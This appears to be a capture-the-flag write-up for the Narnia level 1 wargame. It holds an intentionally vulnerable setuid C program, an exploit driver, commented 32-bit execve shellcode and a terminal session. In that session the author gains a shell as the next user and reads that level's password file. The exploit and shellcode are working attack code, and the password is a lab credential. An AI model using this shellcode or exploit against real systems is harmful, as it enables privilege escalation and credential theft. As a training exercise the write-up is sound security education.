/** narnia1.c */
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h>
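/*
 * narnia1 challenge binary.  Intentionally vulnerable: the level is solved by
 * exploiting it (see hacker1.c and the transcript below), so the flaw is kept,
 * only documented and made to compile cleanly.
 *
 * The value of the EGG environment variable -- entirely under the caller's
 * control, and inherited across execve from whoever launched this process --
 * is cast to a function pointer and called.  Whatever bytes the caller puts in
 * EGG therefore execute with this process's privileges.  The only check is
 * that EGG exists at all.  Because getenv() returns a C string, the payload is
 * whatever precedes the first NUL byte of the variable.
 *
 * Presumably the installed binary is setuid to narnia2 (inferred from the
 * `whoami` output in the transcript, not visible in this source).
 *
 * Exits with status 1 when EGG is unset; otherwise returns 0 if the called
 * code ever returns.  getenv() and exit() come from <stdlib.h>, which the
 * original file did not include (implicit declarations).
 */
int main(void)
{
    int (*ret)(void);
    char *egg = getenv("EGG");

    if (egg == NULL) {
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");

    /* Explicit cast: the original assigned a char * to a function pointer
     * with no cast (a constraint violation; recent GCC rejects it).  Jumping
     * into attacker-supplied data is the vulnerability and is kept on purpose. */
    ret = (int (*)(void))egg;
    ret();
    return 0;
}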
/** hacker1.c */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
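extern char **environ;

/*
 * Exploit driver for narnia1: stage the shellcode in the EGG environment
 * variable, then exec the target so it inherits that environment and jumps
 * into it.
 *
 * argv[1] is the path of the binary to run (the transcript uses
 * /narnia/narnia1).  The payload is the execve("/bin//sh", 0, 0) stub from
 * shellcode.asm, pasted from the objdump extraction in the transcript.  It
 * is 32-bit code (int 0x80 ABI), matching the -m32 build shown there, and it
 * contains no 0x00 byte -- setenv()/getenv() handle the value as a
 * NUL-terminated C string and would cut the payload at the first zero.
 *
 * Returns 1 (with a message on stderr) when no target path is given, when
 * setenv fails, or when the exec fails; on success execle does not return.
 */
int main(int argc, char **argv)
{
    /* Must stay byte-identical to the objdump output in the transcript. */
    static const char shellcode[] =
        "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
        "\x89\xe3\x31\xc9\x89\xca\xcd\x80";

    /* The original dereferenced argv[1] unconditionally; run with no
     * argument that handed a NULL path to execle. */
    if (argc < 2 || argv[1] == NULL) {
        static const char usage[] = "usage: hacker1 <target-binary>\n";
        (void)write(STDERR_FILENO, usage, sizeof usage - 1);
        return 1;
    }

    /* overwrite=1: a pre-existing EGG must not be executed instead of ours. */
    if (setenv("EGG", shellcode, 1) != 0) {
        static const char msg[] = "hacker1: setenv(EGG) failed\n";
        (void)write(STDERR_FILENO, msg, sizeof msg - 1);
        return 1;
    }

    /* environ now carries the updated EGG; pass it explicitly.  The variadic
     * argument list must be terminated by a (char *)NULL, not a bare NULL. */
    execle(argv[1], argv[1], (char *)NULL, environ);

    /* Only reached when the exec itself failed (bad path, not executable). */
    {
        static const char msg[] = "hacker1: execle failed\n";
        (void)write(STDERR_FILENO, msg, sizeof msg - 1);
    }
    return 1;
}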
;shellcode.asm
BITS 32
global _start
section .text
; Linux i386 system call numbers (int 0x80 ABI)
SYS_EXECVE equ 0x0b
_start:
; execve("/bin//sh", 0, 0): eax = syscall number, ebx = path,
; ecx = argv (NULL), edx = envp (NULL).
; Every instruction is chosen so the encoding has no 0x00 byte: the payload
; is delivered through an environment variable and read back with getenv(),
; which stops at the first NUL.  Instruction order is part of the result --
; the bytes in hacker1.c and the transcript come from this exact sequence.
push SYS_EXECVE ; 6a 0b: push imm8 -- a 32-bit mov eax, imm32 would carry zero bytes in its immediate
pop eax ; eax = 11 = SYS_EXECVE
xor esi, esi ; esi = 0 without using an immediate
push esi ; NUL terminator for the path (pushed first, so it lands highest in memory)
push 0x68732f2f ; bytes 2f 2f 73 68 = "//sh" in little-endian; the doubled '/' pads the path to 8 bytes so no NUL is needed inside it
push 0x6e69622f ; bytes 2f 62 69 6e = "/bin"; memory from esp upward now reads "/bin//sh\0"
; execve("/bin//sh", 0, 0);
; ^
; |
; ebx
mov ebx, esp ; ebx = pointer to the "/bin//sh" string just built on the stack
; execve("/bin//sh", 0, 0);
; ^
; |
; ecx
xor ecx, ecx ; ecx = 0 (argv = NULL)
; execve("/bin//sh", 0, 0);
; ^
; |
; edx
mov edx, ecx ; edx = 0 (envp = NULL), copied from ecx to avoid an immediate
int 0x80 ; enter the kernel; on success the process image is replaced by the shell and this code never returns
root@today:~# ssh [email protected]
[email protected]'s password:
narnia1@melinda:~$ cd /tmp/shadowcoder1
narnia1@melinda:/tmp/shadowcoder1$ ls
hacker1 hacker1.c narnia1.c shellcode.asm shellcode.o
narnia1@melinda:/tmp/shadowcoder1$ nasm -f elf32 shellcode.asm -g -F stabs -o shellcode.o
narnia1@melinda:/tmp/shadowcoder1$ for i in $(objdump -d shellcode.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80
narnia1@melinda:/tmp/shadowcoder1$ gcc hacker1.c -o hacker1 -m32
narnia1@melinda:/tmp/shadowcoder1$ ./hacker1 /narnia/narnia1
Trying to execute EGG!
$ whoami
narnia2
$ cat /etc/narnia_pass/narnia2
nairiepecu
$